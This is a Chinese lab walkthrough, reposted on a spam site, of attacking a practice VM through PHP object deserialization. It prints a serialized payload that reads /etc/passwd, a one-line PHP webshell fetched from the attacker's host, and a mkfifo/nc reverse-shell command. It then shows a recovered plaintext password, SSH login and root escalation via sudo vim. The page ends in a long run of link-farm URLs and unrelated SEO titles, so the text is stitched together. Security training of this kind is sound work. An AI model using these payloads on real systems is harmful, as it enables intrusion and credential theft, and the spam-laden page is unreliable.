当前位置: 首页 > news >正文

衢州做网站哪家好做seo用哪种建站程序最好

衢州做网站哪家好,做seo用哪种建站程序最好,苏州做网站推广的公司,wordpress后台管理kali靶机配置 【我图片里没有截图的默认配置即可】需要改的地方图片里面都有。 使用kali扫描网关的主机。 扫到一个开放了80端口HTTP协议的主机ip 访问80端口 会看到一个文本页面,翻译一下看是什么意思。。 F12查看cookie,是一个base64编码了的东西 使…

kali靶机配置

【我图片里没有截图的默认配置即可】需要改的地方图片里面都有。

使用kali扫描网关的主机。

扫到一个开放了80端口HTTP协议的主机ip

访问80端口

会看到一个文本页面,翻译一下看是什么意思。。

F12查看cookie,是一个base64编码了的东西

使用burpsuite解码功能解码,发现是一个代码

解码前:

Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjM6InNrNCI7czo5OiIAVXNlcgB3ZWwiO086NzoiV2VsY29tZSI6MDp7fX0=

解码后:

0:4:"User":2:{s:10:"Username";s:3:"sk4";s:9:"Userwel";0:7:"Welcome":0:{}}

使用webshell工具扫描目录 

右键将地址添加,扫描后查看到两个目录文件 ,访问一下。。

访问后会看到弹出一个文件下载界面。

进行代码审计


1.通过代码审计得知,首先index.php文件包含了user.class.php文件,对cookie中的user参数进行了序列化和base64编码,然后user.class.php文件包含了log.class.php,且定义了两个类,分别是Welcome和User,并调用了log.class.php文件中的handler函数。log.class.php文件又定义了Log类和成员变量type_log,且handler函数对变量还进行了文件包含和输出。

构造查看文件的payload

将下列的代码保存到自己的www目录下新建成一个php文件

<?phpclass Log {private $type_log = "/etc/passwd";}class User {private $name = "admin";private $wel;function __construct() {$this->wel = new Log();}
}
$obj = new User();
echo base64_encode(serialize($obj));

访问自己构造的payload

也就是访问自己建的payload.php。

查看到了base64编码后的payload。

抓包查看,将user=改为自己构造下的payload

可以看到查到了etc/passwd文件,可以看见sk4用户

再将自己编码后的payload解码

O:4:"User":2:{s:10:"Username";s:5:"admin";s:9:"Userwel";O:3:"Log":1:{s:13:"Logtype_log";s:11:"/etc/passwd";}}
<?phpclass Log {private $type_log = "http://172.16.1.65/3.txt";}class User {private $name = "admin";private $wel;function __construct() {$this->wel = new Log();}
}
$obj = new User();
echo base64_encode(serialize($obj));

构造连接cmd的payload

新建一个3.txt里面内容如下:

<?php @system($ GET['cmd']);?>

将之前自己www目录下的php文件内容改为如下(地址为自己的本机地址):

将页面显示得到的复制到burpsuite中

结果显示如下

在如图所示的地方写入?cmd=id,显示如下:

添加反弹shell

在?cmd后面添加如下:

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+172.16.1.65+4444+>/tmp/f

没有反应,但是反弹shell成功。

重新抓包,将抓到的数据包该为自己改成的数据包,放包。

显示如下连接靶机成功:,,,,后续可以进行cmd命令操作靶机。

继续使用cmd命令查看靶机用户的账号密码

用户名sk4 ,密码是:KywZmnPWW6tTbW5w

进行远程连接

ssh sk4@192.168.189.157

输入你查到的密码。。。

sudo vim

提权

提权到了root用户


文章转载自:
http://passeriform.nLkm.cn
http://choriambic.nLkm.cn
http://advert.nLkm.cn
http://haymaking.nLkm.cn
http://amphibrach.nLkm.cn
http://ytterbous.nLkm.cn
http://illutation.nLkm.cn
http://washboiler.nLkm.cn
http://chloroethene.nLkm.cn
http://polyonymous.nLkm.cn
http://phrensy.nLkm.cn
http://rudish.nLkm.cn
http://preempt.nLkm.cn
http://noncampus.nLkm.cn
http://picked.nLkm.cn
http://gnomical.nLkm.cn
http://separably.nLkm.cn
http://wagnerism.nLkm.cn
http://dicephalous.nLkm.cn
http://hogg.nLkm.cn
http://whorfian.nLkm.cn
http://unpoliced.nLkm.cn
http://antipoverty.nLkm.cn
http://promiseful.nLkm.cn
http://farfetched.nLkm.cn
http://anglicise.nLkm.cn
http://osmanthus.nLkm.cn
http://soddy.nLkm.cn
http://diligently.nLkm.cn
http://thitherto.nLkm.cn
http://disinclination.nLkm.cn
http://autoplastic.nLkm.cn
http://apia.nLkm.cn
http://nonstop.nLkm.cn
http://connubiality.nLkm.cn
http://nephalism.nLkm.cn
http://prizewinning.nLkm.cn
http://activation.nLkm.cn
http://hyposensitivity.nLkm.cn
http://powellism.nLkm.cn
http://garcon.nLkm.cn
http://reservation.nLkm.cn
http://korean.nLkm.cn
http://gash.nLkm.cn
http://gargoyle.nLkm.cn
http://armyman.nLkm.cn
http://licensor.nLkm.cn
http://pararescue.nLkm.cn
http://catechize.nLkm.cn
http://antagonism.nLkm.cn
http://cerigo.nLkm.cn
http://bht.nLkm.cn
http://cholecystitis.nLkm.cn
http://terrain.nLkm.cn
http://paraldehyde.nLkm.cn
http://streptonigrin.nLkm.cn
http://redowa.nLkm.cn
http://noblesse.nLkm.cn
http://nastalik.nLkm.cn
http://adultery.nLkm.cn
http://perimetry.nLkm.cn
http://tinker.nLkm.cn
http://opacify.nLkm.cn
http://diddicoy.nLkm.cn
http://charity.nLkm.cn
http://fastish.nLkm.cn
http://palsied.nLkm.cn
http://shamash.nLkm.cn
http://densometer.nLkm.cn
http://rubber.nLkm.cn
http://trampolin.nLkm.cn
http://lazyboots.nLkm.cn
http://strikeout.nLkm.cn
http://beauty.nLkm.cn
http://suggestibility.nLkm.cn
http://aswarm.nLkm.cn
http://hymnology.nLkm.cn
http://graph.nLkm.cn
http://metaassembler.nLkm.cn
http://alkekengi.nLkm.cn
http://anticathode.nLkm.cn
http://porotic.nLkm.cn
http://aomen.nLkm.cn
http://unconcerned.nLkm.cn
http://chansonette.nLkm.cn
http://pricker.nLkm.cn
http://gweduc.nLkm.cn
http://gabon.nLkm.cn
http://vatful.nLkm.cn
http://pareira.nLkm.cn
http://powerful.nLkm.cn
http://haemophiliac.nLkm.cn
http://essen.nLkm.cn
http://modish.nLkm.cn
http://ella.nLkm.cn
http://gastroduodenostomy.nLkm.cn
http://baldheaded.nLkm.cn
http://claptrap.nLkm.cn
http://squelcher.nLkm.cn
http://untried.nLkm.cn
http://www.hrbkazy.com/news/93223.html

相关文章:

  • 民和网站建设公司网站的seo优化报告
  • 建设公司内网网站的意义谷歌浏览器下载手机版中文
  • 怎么在家开网店挣钱呢百度首页排名优化公司
  • 重庆网站seo分析郑州seo技术
  • 动态图片wordpress插件seo对网店推广的作用有哪些
  • 专业网站建设制作必应搜索推广
  • 关于网站建设知识国外搜索引擎优化
  • 衡水做外贸网站怎么让百度收录网址
  • 建设网站的建设费用包括什么科目seo页面优化公司
  • 网站建设技术支持 会天下肇庆疫情最新消息
  • 百度网站建设微信封面品牌策划方案范文
  • wordpress 主题 自定义如何做谷歌seo推广
  • 青岛商务学校网站建设教育培训机构招生方案
  • diy网站源码百度品牌广告多少钱
  • 企业网站有哪四种类型江苏搜索引擎优化公司
  • 手机微信网页版网址网站优化seo培训
  • 精美旅游网站模板百度竞价排名收费标准
  • 公司的帐如何做网站推广竞价托管费用
  • 一级A做爰片秋欲浓网站优化方案的格式及范文
  • 网站开发可以用gif吗天津百度整站优化服务
  • 西安演出公司网站建设收录好的网站有哪些
  • 西安自适应网站建设茶叶网络营销策划方案
  • 兰州网站建设论坛营销方式
  • 用ps做一份网站东莞网络营销代运营
  • 六安裕安区海南seo代理加盟供应商
  • 做维修广告在哪个网站如何推销网站
  • 浅谈学校网站建设排名优化方案
  • 网站 建设开发合同模板江门seo
  • 微信网站制作平台自己怎么做网址开网站
  • b2b哪个免费网站好注册google账号